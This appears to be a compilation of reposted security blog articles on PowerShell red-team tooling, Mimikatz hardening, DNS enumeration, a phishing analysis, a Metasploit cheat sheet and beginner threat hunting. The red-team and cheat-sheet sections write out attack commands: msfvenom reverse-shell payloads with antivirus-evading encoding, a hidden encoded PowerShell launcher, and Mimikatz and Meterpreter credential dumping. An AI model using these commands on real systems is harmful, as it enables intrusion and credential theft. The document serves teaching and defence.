Powershell for Red Teams



PowerShell is a task-based command-line shell and scripting language designed for system administrators and power users to automate the administration of multiple operating systems (Linux, macOS, Unix and Windows) and the processes related to the applications that run on them. It is open source; the official repository is https://github.com/PowerShell/PowerShell

This chapter gives an overview of how PowerShell is used in red teaming engagements. We are going to explore:

Metasploit and Powershell:

To start, let's look at the PowerShell modules in Metasploit, which ships with many PowerShell-related attack modules:

msf> search powershell

To wrap a PowerShell script in a malicious executable, you can use the msfvenom utility:

msfvenom -p windows/exec CMD="powershell -ep bypass -w hidden -enc [PowerShell script here]" -f exe -o /root/home/ghost/Desktop/power.exe


PowerSploit is a collection of Microsoft PowerShell modules that can be used to aid penetration testers during all phases of an assessment. PowerSploit consists of the following modules and scripts:

  • CodeExecution
  • ScriptModification
  • Persistence
  • AntivirusBypass
  • Exfiltration
  • Mayhem
  • Privesc
  • Recon

For more details, you can visit the project's GitHub repository: https://github.com/PowerShellMafia/PowerSploit


PowerView is a PowerShell script that lets you perform many reconnaissance tasks, for example:

  • Users: Get-NetUser
  • Groups: Get-NetGroup
  • Sessions: Get-NetSession
  • GPO locations: Find-GPOLocation
  • Active Directory objects: Set-ADObject
  • Forests: Get-NetForest

It is part of the PowerSploit project.

Nishang – PowerShell for penetration testing

Nishang is a framework and collection of scripts and payloads which enables usage of PowerShell for offensive security, penetration testing and red teaming. Nishang is useful during all phases of penetration testing.

Github Link: https://github.com/samratashok/nishang

To import Nishang modules, use the PowerShell cmdlet Import-Module. If you receive an error message, make sure that you have the right privileges and that the execution policy allows the scripts to run:

Set-ExecutionPolicy -ExecutionPolicy RemoteSigned

To learn more about a module, use PowerShell's built-in help:

Get-Help <module>

You can now use Nishang's many scripts, such as:

  • Get-WLAN-Keys
  • Get-PassHashes
  • Get-Information
  • Invoke-Mimikatz
  • Invoke-CredentialsPhish


In this section we are going to explore Empire, a PowerShell and Python post-exploitation agent maintained at http://www.powershellempire.com/

Before learning how to use this framework, we need a fair understanding of some important terminology.

What is Post Exploitation?

According to the Penetration Testing Execution Standard:

“The purpose of the Post-Exploitation phase is to determine the value of the machine compromised and to maintain control of the machine for later use. The value of the machine is determined by the sensitivity of the data stored on it and the machine's usefulness in further compromising the network.”

To use the project, clone it from the following GitHub repository: https://github.com/EmpireProject/Empire

Clone it and run sudo ./setup/install.sh

This is the main screen of Empire:


As you can see, this project has three major components:

  • Modules
  • Listeners
  • Agents

Kali Ninja (https://creator.wonderhowto.com/kalininja/) defines them as follows:

  • A listener is a process which listens for a connection from the machine we are attacking. This helps Empire send the loot back to the attacker’s computer.
  • A stager is a snippet of code that allows our malicious code to be run via the agent on the compromised host.
  • An agent is a program that maintains a connection between your computer and the compromised host.

To list the listeners, type:


To use a specific listener, type:


To see the options of the selected listener, type info.

For a demonstration, you can follow the demo scenario Post-Exploitation with PowerShell Empire 2.0 by Gus Khawaja, who uses this workflow to show the power of the Empire 2.0 framework.


Mimikatz is a C project developed by Benjamin Delpy. It is generally used to extract credentials from memory (plaintext passwords, hashes, PIN codes and Kerberos tickets). You can download it from: https://github.com/gentilkiwi/mimikatz/releases

To get the debug privilege, type:

privilege::debug

To extract the hostname, type:


To dump logon passwords, use:

sekurlsa::logonPasswords full


In this chapter we looked at some of the well-known PowerShell projects that help red teamers in their engagements.

Defending Windows Domain Against Mimikatz Attacks

The IT community remembers late June 2017 for the massive infection of many of the largest companies and government institutions in Ukraine, Russia, Germany, France and other countries with a new ransomware, Petya (NotPetya). In most cases, after penetrating a corporate network, Petya quickly spread to all computers and servers of the domain, paralysing 70-100% of the Windows infrastructure. One of the methods Petya used to spread to network computers was the EternalBlue exploit (as with WannaCry), but that was not the main distribution channel. Unlike WannaCry, which spread only through the SMBv1 vulnerability, NotPetya was designed to attack corporate networks: after infecting a system, the malware obtained the credentials (passwords, hashes) of the computer's users with the publicly available Mimikatz tool and used them to spread further in the network via WMI and PsExec, up to total control over the domain. So installing the MS17-010 security update alone was not enough to protect against it.

In this article, we'll look at the basic techniques for defending Windows systems in an Active Directory domain against attacks by Mimikatz-like tools.

Using the sekurlsa module, Mimikatz can extract the passwords and hashes of authenticated users that are stored in the LSASS.EXE (Local Security Authority Subsystem Service) process. We have already published an article with an example of using Mimikatz to get user passwords in clear text (from WDigest, LiveSSP and SSP).

  • How to Prevent Getting Debug Privileges
  • Disabling WDigest
  • LSA Protection Against Connection of Third-Party Modules
  • How to Disable LM and NTLM
  • How to Disable Reversible Encryption
  • Protected Users Security Group
  • How to Prevent the Use of Saved Passwords
  • How to Disable Credential Caching
  • Credential Guard
  • Conclusion

How to Prevent Getting Debug Privileges

The article linked above shows how the debug privilege lets Mimikatz access the LSASS system process and extract passwords from it.

By default, permission to use debug mode is granted to the local administrators group (BUILTIN\Administrators). In 99% of cases administrators do not use this feature (as a rule, it is needed by system programmers), so for security purposes it is better to take SeDebugPrivilege away from them. You can do it using a GPO (local or domain). Go to Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> User Rights Assignment and define the policy Debug programs. Add the domain group of users who may need debug privileges (as a rule, the developers), or leave the list empty so that nobody has this privilege.


Now if you try to get debug privileges using mimikatz, the following error will appear:

ERROR kuhl_m_privilege_simple ; RtlAdjustPrivilege (20) c0000061


Note. However, the restrictions of this policy can easily be circumvented; see the article How to Obtain SeDebugPrivilege.

Disabling WDigest

The WDigest protocol appeared in Windows XP and is used for HTTP Digest Authentication, which requires the user's password in clear text. The ability to completely prohibit storing clear-text passwords in LSASS appeared in Windows 8.1 and Server 2012 R2. To prohibit keeping WDigest credentials in memory on these OSs, set the DWORD parameter named UseLogonCredential to the value 0 in the following registry branch: HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest.

If you want to completely disable the WDigest authentication method, set the Negotiate parameter to 0 in the same registry branch (HKEY_LOCAL_MACHINE\System\CurrentControlSet\Control\SecurityProviders\WDigest).

To enable this feature in Windows 7, 8 and Windows Server 2008 R2 / 2012, install the KB2871997 update and then set these keys in the registry. In a domain environment it is easier to distribute the registry keys using a GPO.


Tip. Before you disable WDigest credential storage in memory, test that users and applications still authenticate correctly on your IIS servers.

LSA Protection Against Connection of Third-Party Modules

In Windows 8.1 and Windows Server 2012 R2 it became possible to enable LSA protection, which protects LSA memory and prevents unprotected processes from accessing it. To enable this protection, create the RunAsPPL parameter with the value 1 in the following registry branch: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\LSA.

Once this parameter has been applied, an attacker will not be able to access LSA memory, and Mimikatz returns the following error for the sekurlsa::logonpasswords command:

ERROR kuhl_m_sekurlsa_acquireLSA : Handle on memory (0x00000005).


How to Disable LM and NTLM

The obsolete LM authentication protocol, and with it the storage of LM hashes, should be disabled using the Network Security: Do Not Store LAN Manager Hash Value On Next Password Change group policy (at the Default Domain Policy level).

Then you should stop using at least the NTLMv1 protocol (the policy in the Computer Configuration -> Policies -> Windows Settings -> Security Settings -> Local Policies -> Security Options section, Network Security: Restrict NTLM: NTLM authentication in this domain), or better still NTLMv2 as well.

Disabling NTLMv1 usually goes without problems, but disabling NTLMv2 takes some effort. In large infrastructures the usual outcome is a scenario of maximum restriction on NTLMv2: Kerberos authentication is used wherever possible (you will have to spend some time configuring Kerberos authentication for IIS and SQL), and the remaining systems keep NTLMv2.

How to Disable Reversible Encryption

You should explicitly prohibit storing user passwords in AD in clear text. To do it, configure the domain policy Store password using reversible encryption for all users in the domain in the Computer Configuration -> Windows Settings -> Security Settings -> Account Policies -> Password Policy section and set it to Disabled.


Protected Users Security Group

At the Windows Server 2012 R2 domain functional level, you can use the special security group Protected Users to protect privileged users. In particular, these accounts are protected against compromise because members of the group can authenticate only using Kerberos (no NTLM, WDigest, CredSSP, etc.). Follow the link above for more information. It is advisable to add the accounts of domain and server administrators to this group. The feature is available on Windows Server 2012 R2 servers (for Windows Server 2008 R2 you will have to install the above-mentioned KB2871997 update).

How to Prevent the Use of Saved Passwords

You can prevent domain users from storing their passwords in Credential Manager for access to network resources.

To do it, enable the Network access: Do not allow storage of passwords and credentials for network authentication policy in the Computer Configuration -> Windows Settings -> Security Settings -> Local Policies -> Security Options section.


Note. Storing passwords will also be forbidden for Task Scheduler jobs.

How to Disable Credential Caching

One of Mimikatz's features is extracting password hashes from the HKEY_LOCAL_MACHINE\SECURITY\Cache registry key, where the password hashes of the last 10 (by default) domain users who logged on are stored. These hashes are used to authenticate users when the domain controller is not available.

It is recommended to prohibit storing cached credentials by setting the Interactive Logon: Number of previous logons to cache (in case domain controller is not available) policy in Computer Configuration -> Windows Settings -> Local Policies -> Security Options to 0.


Also, to speed up clearing the credentials of logged-off users from LSASS memory, create a DWORD parameter named TokenLeakDetectDelaySecs with the value 30 in HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa. The memory will then be cleared 30 seconds after the user logs off. On Windows 7, 8 / Server 2008 R2, 2012 you will have to install the above-mentioned KB2871997 update for this key to work.
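The settings described in the sections above are scattered over several registry branches, so it helps to have one script that reports where a host stands. The following audit script is an added example, not code from the original article, and it makes two assumptions that are spelled out in its comments: the values UseLogonCredential, Negotiate, RunAsPPL and TokenLeakDetectDelaySecs come straight from the article, while NoLMHash, DisableDomainCreds and CachedLogonsCount are the registry values that the corresponding group policies write (the editor's mapping, to be confirmed against your own GPO results).

```powershell
# Added audit script; it is not part of the original article. It reads the registry
# values behind the hardening settings described above and reports any that are not
# at the recommended value. Run it in an elevated PowerShell session on the host to check.
#
# Provenance of the values:
#  - UseLogonCredential, Negotiate, RunAsPPL and TokenLeakDetectDelaySecs are named in
#    the article above.
#  - NoLMHash, DisableDomainCreds and CachedLogonsCount are the registry values written
#    by the "Do not store LAN Manager hash", "Do not allow storage of passwords and
#    credentials" and "Number of previous logons to cache" policies; that mapping is
#    the editor's knowledge, not something the article states, so confirm it against
#    "gpresult /h report.html" before acting on a finding.
# The SeDebugPrivilege user-rights assignment is stored in the local security policy,
# not the registry, so it is not covered here ("whoami /priv" shows the current token).

$HardeningChecks = @(
    [pscustomobject]@{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'; Name = 'UseLogonCredential';        Expected = '0';  Purpose = 'no clear-text WDigest credentials in LSASS' }
    [pscustomobject]@{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\SecurityProviders\WDigest'; Name = 'Negotiate';                Expected = '0';  Purpose = 'WDigest authentication disabled (optional)' }
    [pscustomobject]@{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                        Name = 'RunAsPPL';                 Expected = '1';  Purpose = 'LSA runs as a protected process' }
    [pscustomobject]@{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                        Name = 'TokenLeakDetectDelaySecs'; Expected = '30'; Purpose = 'logged-off credentials cleared after 30 s' }
    [pscustomobject]@{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                        Name = 'NoLMHash';                 Expected = '1';  Purpose = 'LM hashes not stored' }
    [pscustomobject]@{ Path = 'HKLM:\SYSTEM\CurrentControlSet\Control\Lsa';                        Name = 'DisableDomainCreds';       Expected = '1';  Purpose = 'Credential Manager cannot save network passwords' }
    [pscustomobject]@{ Path = 'HKLM:\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Winlogon';       Name = 'CachedLogonsCount';        Expected = '0';  Purpose = 'no cached domain logons' }
)

function Get-RegistryValueOrNull {
    param([string]$Path, [string]$Name)
    # Returns $null when either the key or the value is missing, so the caller can
    # tell "not configured" apart from "configured with the wrong value".
    $item = Get-ItemProperty -Path $Path -Name $Name -ErrorAction SilentlyContinue
    if ($null -eq $item) { return $null }
    return $item.$Name
}

function Test-CredentialHardening {
    param([object[]]$Checks = $HardeningChecks)
    foreach ($check in $Checks) {
        $actual = Get-RegistryValueOrNull -Path $check.Path -Name $check.Name
        # Compare as strings: CachedLogonsCount is REG_SZ, the others are REG_DWORD.
        if ($null -eq $actual) { $status = 'NOT SET' } elseif ("$actual" -eq $check.Expected) { $status = 'OK' } else { $status = 'REVIEW' }
        [pscustomobject]@{
            Status   = $status
            Value    = "$($check.Path)\$($check.Name)"
            Expected = $check.Expected
            Actual   = if ($null -eq $actual) { '-' } else { "$actual" }
            Purpose  = $check.Purpose
        }
    }
}

# Non-OK rows first. "NOT SET" needs interpretation: a missing UseLogonCredential means
# "disabled" on Windows 8.1 / 2012 R2 and later, but "enabled" on older systems that
# only received KB2871997.
Test-CredentialHardening | Sort-Object { $_.Status -eq 'OK' } | Format-Table -AutoSize
```

The script only reads; it deliberately does not set anything, because the article's own advice is to roll these settings out step by step with testing (WDigest in particular can break IIS authentication). Use the REVIEW and NOT SET rows as the worklist for the GPO changes described above.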

Credential Guard

In Windows 10 Enterprise and Windows Server 2016 a new component, Credential Guard, isolates and protects LSASS from unauthorized access. For more information, click here.


The methods considered above considerably restrict the ability of Mimikatz and similar tools to obtain administrators' passwords and hashes from LSASS and the system registry. If you decide to implement these policies and methods, do it step by step, with mandatory testing.

In the next article we'll consider best practices for improving security in Windows networks by restricting the use of administrator accounts, which should improve the protection of a Windows domain against such attacks at both the technical and organizational levels. Watch for updates!

Original Post: http://woshub.com/defending-windows-domain-against-mimikatz-attacks/

Information Gathering: DNS Enumeration and Zone Transfer with Nslookup, Host, Dnsrecon, Dnsenum, Fierce, NSE and whois


– Layout for this exercise:

1 – Introduction

– DNS servers are among the best sources for gathering information about a domain or an organization.

– DNS servers hold the DNS and mail information for the domain, with authority over what is returned to public requests from the Internet.

– Because of the abundant and interesting information held in DNS servers, DNS enumeration is one of the most critical steps in gathering information about a target.

– DNS zone transfer, also known by the DNS query type that triggers it, AXFR, is a type of DNS transaction.

– DNS zone transfer is one of the mechanisms available to administrators for replicating DNS databases across a set of DNS servers.

– A zone transfer uses the Transmission Control Protocol (TCP) for transport and takes the form of a client–server transaction.

– The client requesting a zone transfer may be a slave (secondary) server requesting data from a master (primary) server.

– The portion of the database containing the list of all DNS names is the zone file.

– The data contained in a DNS zone may be sensitive from an operational security point of view.

– This is because information such as server hostnames may become public knowledge, which can be used to learn about an organization and even widen its attack surface.


2 – nslookup

– nslookup is a popular tool that queries the name and mail servers on the Internet for a given domain:

– Applying the NS query option for name servers:

– Applying the MX query option for mail servers:

– Applying the ANY query option for both name and mail servers:

3 – host 

– host is a Linux command that performs powerful DNS lookups for a given domain name:

– Without any parameters, host prints its help:

– Looking for name servers (-t type ns):

– Looking for email servers (-t type mx):

– Looking for web servers (-t type www):

4 – DNS Zone Transfer with host

– Now let's use host for a slightly more complicated task: a DNS zone transfer.

– First, let's try the previously enumerated ns1 name server. The zone transfer fails:

– However, the zone transfer with ns2 is successful:

– Finally, the zone transfer with ns3 also fails:

– The result of the successful zone transfer with ns2 is a full dump of the zone file for the whole domain, giving us a list of IPs and their corresponding DNS names.

– Let's try entering some of the IPs obtained from the zone transfer into a browser:

5 – dnsrecon

– dnsrecon is an automated DNS enumeration tool written as a Python script.


– Let's check that the information dnsrecon provides is the same as obtained before.

– First, dnsrecon detects the DNS servers ns1, ns2 and ns3:

– Then, dnsrecon performs a successful DNS zone transfer with ns2:

– dnsrecon also tries a DNS zone transfer with ns1 and ns3, with no result:

6 – dnsenum

– dnsenum is a multithreaded Perl script that enumerates DNS information for a domain.


– The output obtained with dnsenum is the same as before:

7 – fierce

– fierce is a Perl-based script that performs DNS enumeration. The results obtained with fierce are very similar to the previous ones:

8 – Nmap Scripting Engine (NSE)

– The Nmap Scripting Engine (NSE) is an addition to Nmap that provides scripts to automate many tasks:


– The NSE dns-zone-transfer script provides the same output as before:

– A more limited result, since it only finds a list of common subdomains, is obtained with the NSE dns-brute script:

9 – whois 

– whois is a query and response protocol that is widely used for querying databases that store the registered users of an Internet resource, such as a domain name, an IP address block or an autonomous system.

– Looking up the domain megacorpone.com:

Original Post: https://www.whitelist1.com/2017/10/information-gathering-dns-enumeration.html 

Behind the Scene: Microsoft Phishing Campaign Analysis

The technique used in this phishing campaign drew my attention and warranted further analysis.

The phishing email spoofs Microsoft support to trick the user into clicking the phishing URL.


Tracking down the email header:

Received: from holla (ZeMUxqZXZhgrTP0ikgiWW1o4dTNLMAF5sRFeLlEyBa8wsHdKyqFyHV85oz34oJZQ6M@[]) by fwd40.t-online.de

The sender machine is on Microsoft Azure, likely a hacked machine.
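The Received: header quoted above is where this kind of tracing starts: each relay prepends its own Received: line, so the origin host is the last one. The following script is an added example, not part of the original post; it unfolds the headers of a raw message, lists the hops in delivery order and extracts the bracketed IP literal of each hop so it can be looked up. The headers it parses are constructed for the example, and 198.51.100.10 and 203.0.113.45 are documentation addresses rather than real relays.

```powershell
# Added example; it is not from the original post. It unfolds the headers of a raw
# message, lists the Received: hops in the order the message actually travelled
# (the last Received: header is the first hop), and pulls out the IP literal of each
# hop so the originating host can be looked up. The headers below are constructed for
# this example; 198.51.100.10 and 203.0.113.45 are documentation addresses.

$SampleHeaders = @'
Received: from mx1.example.net (mx1.example.net [198.51.100.10])
    by mail.example.org with ESMTPS id 4Qz1a2
    for <alice@example.org>; Tue, 5 Mar 2019 08:15:02 +0000
Received: from holla (unknown [203.0.113.45])
    by mx1.example.net with ESMTP; Tue, 5 Mar 2019 08:14:58 +0000
From: "Microsoft Support" <support@notifications.example>
Subject: Action required on your Office 365 account
'@

function Get-UnfoldedHeader {
    param([string]$RawHeaders)
    # RFC 5322 folding: a line starting with whitespace continues the previous header.
    $unfolded = New-Object System.Collections.Generic.List[string]
    foreach ($line in ($RawHeaders -split "`r?`n")) {
        if ($line -match '^\s' -and $unfolded.Count -gt 0) {
            $unfolded[$unfolded.Count - 1] += ' ' + $line.Trim()
        } else {
            $unfolded.Add($line)
        }
    }
    return $unfolded
}

function Get-ReceivedHop {
    param([string]$RawHeaders)
    $received = @(Get-UnfoldedHeader -RawHeaders $RawHeaders | Where-Object { $_ -match '^Received:' })
    # Each relay prepends its own Received: header, so reverse to get delivery order.
    [array]::Reverse($received)
    $hop = 0
    foreach ($header in $received) {
        $hop++
        $from = if ($header -match '\bfrom\s+(\S+)') { $Matches[1] } else { '' }
        $ip   = if ($header -match '\[(\d{1,3}(?:\.\d{1,3}){3})\]') { $Matches[1] } else { '' }
        $by   = if ($header -match '\bby\s+(\S+)') { $Matches[1] } else { '' }
        [pscustomobject]@{ Hop = $hop; From = $from; SourceIP = $ip; By = $by }
    }
}

# Hop 1 is the host that handed the message to the first relay. Only the hops added by
# servers you trust (your own MX and everything after it) are reliable; anything earlier
# in the chain can have been written by the sender.
Get-ReceivedHop -RawHeaders $SampleHeaders | Format-Table -AutoSize
```

For the sample, hop 1 is the host calling itself "holla" at 203.0.113.45, received by mx1.example.net; that IP (in a real case, the one taken from your own MX's Received: line) is what you check against the hosting provider's ranges and your reputation sources.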



That hacked machine has 44 open ports, all of them hosting HTTP services.

A non-UTF-8 character is inserted between "Office" and "365" to fool spam detection.


Instead of an HTTP redirect, the campaign uses a JavaScript technique to bypass URL checking by the major email protection vendors.


Dynamic DNS hosting is used for the phishing sites.


The Office 365 phishing site looks exactly the same as Microsoft Office 365 login page.


The phishing site is hosted at a hosting provider in Russia.


Microsoft Safe Links protection is able to detect the phishing site before the JavaScript redirection.


Metasploit Cheat Sheet

The Metasploit Project is a computer security project that provides information on vulnerabilities, helping in the development of penetration tests and IDS signatures.
Metasploit is a popular tool used by pentest experts.


Metasploit :

Search for module:

msf > search [regex]

Specify an exploit to use:

msf > use exploit/[ExploitPath]

Specify a Payload to use:

msf > set PAYLOAD [PayloadPath]

Show options for the current module:

msf > show options

Set options:

msf > set [Option] [Value]

Start exploit:

msf > exploit 

Useful Auxiliary Modules

Port Scanner:

msf > use auxiliary/scanner/portscan/tcp
msf > set RHOSTS
msf > run

DNS Enumeration:

msf > use auxiliary/gather/dns_enum
msf > set DOMAIN target.tgt
msf > run

FTP Server:

msf > use auxiliary/server/ftp
msf > set FTPROOT /tmp/ftproot
msf > run

Proxy Server:

msf > use auxiliary/server/socks4
msf > run 

msfvenom :
The msfvenom tool can be used to generate Metasploit payloads (such as Meterpreter) as standalone files and optionally encode them. This tool replaces the former msfpayload and msfencode tools. Run with '-l payloads' to get a list of payloads.

$ msfvenom -p [PayloadPath] -f [FormatType] LHOST=[LocalHost (if reverse conn.)]

Example :
Reverse Meterpreter payload as an executable, redirected into a file:

$ msfvenom -p windows/meterpreter/reverse_tcp -f exe LHOST=[LocalHost] LPORT=4444 > met.exe

Format options (specified with -f):

  • --help-formats – list available output formats
  • exe – executable
  • pl – Perl
  • rb – Ruby
  • raw – raw shellcode
  • c – C code
Encoding Payloads with msfvenom
The msfvenom tool can be used to apply a level of encoding for anti-virus bypass. Run with '-l encoders' to get a list of encoders.

$ msfvenom -p [Payload] -e [Encoder] -f [FormatType] -i [EncodeIterations] LHOST=[LocalHost (if reverse conn.)]

Encode a payload 5 times using the shikata_ga_nai encoder and output it as an executable:

$ msfvenom -p windows/meterpreter/reverse_tcp -i 5 -e x86/shikata_ga_nai -f exe LHOST=[LocalHost] LPORT=4444 > mal.exe

Metasploit Meterpreter

Base Commands:
? / help: Display a summary of commands
exit / quit: Exit the Meterpreter session
sysinfo: Show the system name and OS type
shutdown / reboot: Self-explanatory
File System Commands:
cd: Change directory
lcd: Change directory on local (attacker’s) machine
pwd / getwd: Display current working directory
ls: Show the contents of the directory
cat: Display the contents of a file on screen
download / upload: Move files to/from the target machine
mkdir / rmdir: Make / remove directory
edit: Open a file in the default editor (typically vi)
Process Commands:
getpid: Display the process ID that Meterpreter is running inside.
getuid: Display the user ID that Meterpreter is running with.
ps: Display process list.
kill: Terminate a process given its process ID.
execute: Run a given program with the privileges of the process the Meterpreter is loaded in.
migrate: Jump to a given destination process ID

  • Target process must have same or lesser privileges
  • Target process may be a more stable process
  • When inside a process, can access any files that process has a lock on.

Network Commands:
ipconfig: Show network interface information
portfwd: Forward packets through TCP session
route: Manage/view the system’s routing table

Misc Commands:
idletime: Display the duration that the GUI of the target machine has been idle.
uictl [enable/disable] [keyboard/mouse]: Enable/disable either the mouse or keyboard of the target machine.
screenshot: Save as an image a screenshot of the target machine.

Additional Modules:
use [module]: Load the specified module
use priv: Load the priv module
hashdump: Dump the hashes from the box
timestomp: Alter NTFS file timestamps

Managing Sessions

Multiple Exploitation:
Run the exploit expecting a single session that is immediately backgrounded:

msf > exploit -z

Run the exploit in the background expecting one or more sessions that are immediately backgrounded:

msf > exploit -j

List all current jobs (usually exploit listeners):

msf > jobs -l

Kill a job:

msf > jobs -k [JobID]

Multiple Sessions:

List all backgrounded sessions:

msf > sessions -l

Interact with a backgrounded session:

msf > sessions -i [SessionID]

Background the current interactive session:

meterpreter > <Ctrl+Z>
meterpreter > background

Routing Through Sessions:
All modules (exploits/post/aux) run against the target subnet will be pivoted through this session.

msf > route add [Subnet to Route To] [Subnet Netmask] [SessionID]


Original post: https://www.kitploit.com/2019/02/metasploit-cheat-sheet.html

Threat Hunting for Non-Hunters

Threat hunting is a proactive task that assumes your organization has already been breached and that you want to beat the average "dwell time" of 256 days; at least that is how I see it as a DFIR practitioner. It is usually done with the help of the tools we call our "arsenal", mostly SIEM (security information and event management) and EDR (endpoint detection and response).

However, security is not just for the IT security folks who are paid mainly to do this kind of "Blue Teaming" work (aka incident responders); it is everyone's responsibility.

Humans are the weakest link in the security chain, so as an end user anyone should have a basic understanding of how to find malicious activity and files on their workstation.

Malware, or malicious software, includes but is not limited to keyloggers, credential stealers, crypto miners, reverse shells, ransomware, botnets and more.

This article aims to give non-security folks a portion of the technical knowledge needed to hunt threats on their Windows systems, using freely downloadable tools from the Internet, and to share it with their families and friends as well.

Hunting Persistent Threat with Autorun Programs

There are a huge number of places in the system where an adversary can plant malicious programs that run automatically at boot time without the end user's awareness.

Two tools from Microsoft's Sysinternals Suite, "autorunsc.exe" (command line) and "Autoruns.exe" (graphical user interface), show all autorun programs on your machine; they can be downloaded from the link below.

Download URL:


Adding the -h parameter to the autorunsc.exe command gives you the MD5 or SHA-256 hashes of each file, which you can check against VirusTotal (https://www.virustotal.com), an open-source intelligence (OSINT) site for malicious files and URLs.


autorunsc.exe -h

The output can also be redirected to a text file for reference and easy record-keeping.


autorunsc.exe -h > autoruns.txt

"autorunsc.exe -help" lists more options to play around with in the command-line tool on Windows.

More often, the graphical version of Autoruns is preferable, as a simple right-click gives you the option to check the program on VirusTotal on the spot.
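Checking a full Autoruns listing by hand is slow, so the first thing a hunter does is narrow it to entries worth a look. The script below is an added example, not code from the original post or from Sysinternals; it assumes autorunsc was run as "autorunsc.exe -a * -c -h -s -nobanner > autoruns.csv" (CSV output with hashes and signature verification) and keeps only entries whose image is not signature-verified or runs from a user-writable folder. The sample rows are constructed with placeholder hashes, and the column names follow the autorunsc CSV layout as the editor recalls it, so compare them with the header of your own file before trusting the filters.

```powershell
# Added triage script; it is not from the original article. It takes the CSV that
# "autorunsc.exe -a * -c -h -s -nobanner > autoruns.csv" produces and keeps only the
# entries worth a manual look: images whose signature is not verified, and images that
# run from user-writable folders. The rows below are constructed for this example, with
# placeholder hashes; the column names follow the autorunsc CSV layout as the editor
# recalls it, so compare them with the header of your own file before trusting the filters.

$SampleCsv = @'
"Time","Entry Location","Entry","Enabled","Category","Profile","Description","Signer","Company","Image Path","Version","Launch String","MD5","SHA-1","PESHA-1","PESHA-256","SHA-256","IMP"
"1/1/2019 9:00","HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","SecurityHealth","enabled","Logon","System-wide","Windows Security notification icon","(Verified) Microsoft Windows","Microsoft Corporation","c:\windows\system32\securityhealthsystray.exe","10.0.17763.1","%windir%\system32\SecurityHealthSystray.exe","md5-placeholder-1","sha1-placeholder-1","","","sha256-placeholder-1",""
"2/3/2019 14:12","HKCU\SOFTWARE\Microsoft\Windows\CurrentVersion\Run","Updater","enabled","Logon","alice","","(Not verified) Contoso Ltd","Contoso Ltd","c:\users\alice\appdata\roaming\updater\updater.exe","1.0.0.0","C:\Users\alice\AppData\Roaming\updater\updater.exe","md5-placeholder-2","sha1-placeholder-2","","","sha256-placeholder-2",""
"2/3/2019 14:15","Task Scheduler","\Nightly","enabled","Tasks","System-wide","","","","c:\programdata\nightly\nightly.exe","","C:\ProgramData\nightly\nightly.exe","md5-placeholder-3","sha1-placeholder-3","","","sha256-placeholder-3",""
'@

# Folders an ordinary user can write to; a program starting from one of these at boot or
# logon deserves a second look even when it carries a company name.
$UserWritablePattern = '\\(appdata|temp|programdata|downloads|public)\\'

function Get-SuspiciousAutorun {
    param([string]$CsvText)
    $entries = $CsvText | ConvertFrom-Csv
    foreach ($entry in $entries) {
        $reasons = @()
        if ($entry.Signer -notlike '(Verified)*') { $reasons += 'signature not verified' }
        if ($entry.'Image Path' -match $UserWritablePattern) { $reasons += 'runs from a user-writable folder' }
        if ($reasons.Count -eq 0) { continue }
        [pscustomobject]@{
            Entry      = $entry.Entry
            Location   = $entry.'Entry Location'
            Image      = $entry.'Image Path'
            Signer     = if ($entry.Signer) { $entry.Signer } else { '(unsigned)' }
            Reasons    = $reasons -join '; '
            # Direct link for the manual VirusTotal check the article suggests.
            VirusTotal = "https://www.virustotal.com/gui/file/$($entry.'SHA-256')"
        }
    }
}

# On a real host: Get-SuspiciousAutorun -CsvText (Get-Content .\autoruns.csv -Raw)
Get-SuspiciousAutorun -CsvText $SampleCsv | Format-List
```

With the sample input the Microsoft-signed entry drops out and the two others are reported: the AppData "Updater" on both counts, the unsigned ProgramData task on both counts too. A flagged entry is not proof of malware; it is the short list you hash-check and, if needed, hand to someone for analysis.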

Threat Hunting Hidden Processes

Anti-virus (AV), whether traditional or self-described "next-gen AV", misses more than 70% of malware according to research, because it is still signature-based. Sophisticated malicious programs run as hidden processes to evade AV detection.

The most common malware of this kind is the "rootkit", a malicious program that runs in the system's kernel or memory.

Below are useful tools that can be used against this persistent threat on anyone's PC.


GMER is an excellent tool for detecting rogue processes; it can be downloaded here: http://www.gmer.net/

This is a PE (portable executable) tool, like the Sysinternals Suite and the other tools mentioned here.

With the aid of procexp64.exe from the Sysinternals Suite (for 64-bit Windows), the tool was found spawning different DLLs and processes that were also identified as malicious based on the indicators of compromise (IOCs) found on VirusTotal:


Threat Hunting Command & Control

Command & Control (C2 or C&C) is a server that gives directives to digital devices, commonly computers and smartphones, that have been infected with a rootkit or with malware such as ransomware and its variants. These infected devices are called "bots", and a group of them a "botnet" (from "robot"). Botnets are also used for sending spam and for Distributed Denial of Service (DDoS) attacks against a target.

Known C2 servers will most likely be detected by the firewall if it is enabled on a PC or company-provided workstation, except in a "zero-day" attack, when the C2 server is not yet known to the EDR and firewall vendors.

This may sound a little technical, but it is good to know, since the tool used as the example here is already included in Windows.

By opening the command prompt (CMD) as administrator, you will be able to run the tool called NETSTAT.

In the command prompt, type the command below with the -ano parameters to display all network connections, with port numbers and process IDs. The -f parameter shows the fully qualified domain name (simply put, the website address) of the established connections over the Internet for quick identification.


netstat -ano

netstat -af

The tool prints a number of lines depending on how many browser tabs are open while connected to the Internet; it will also include the connection to the C&C server if the host is infected with malware or part of a botnet.

This network threat hunting process may take a few minutes, as it requires going through the public IP addresses in the LISTENING and ESTABLISHED states and checking them against OSINT sources such as VirusTotal, OTX and other websites that provide IP-based IOCs.

If no IOC is found in OSINT, a healthy paranoia is needed to stop the running processes based on the PID (process ID) reported by NETSTAT: open Task Manager (press CTRL+ALT+DELETE), find the PID under the Details tab, right-click it and choose End Task.
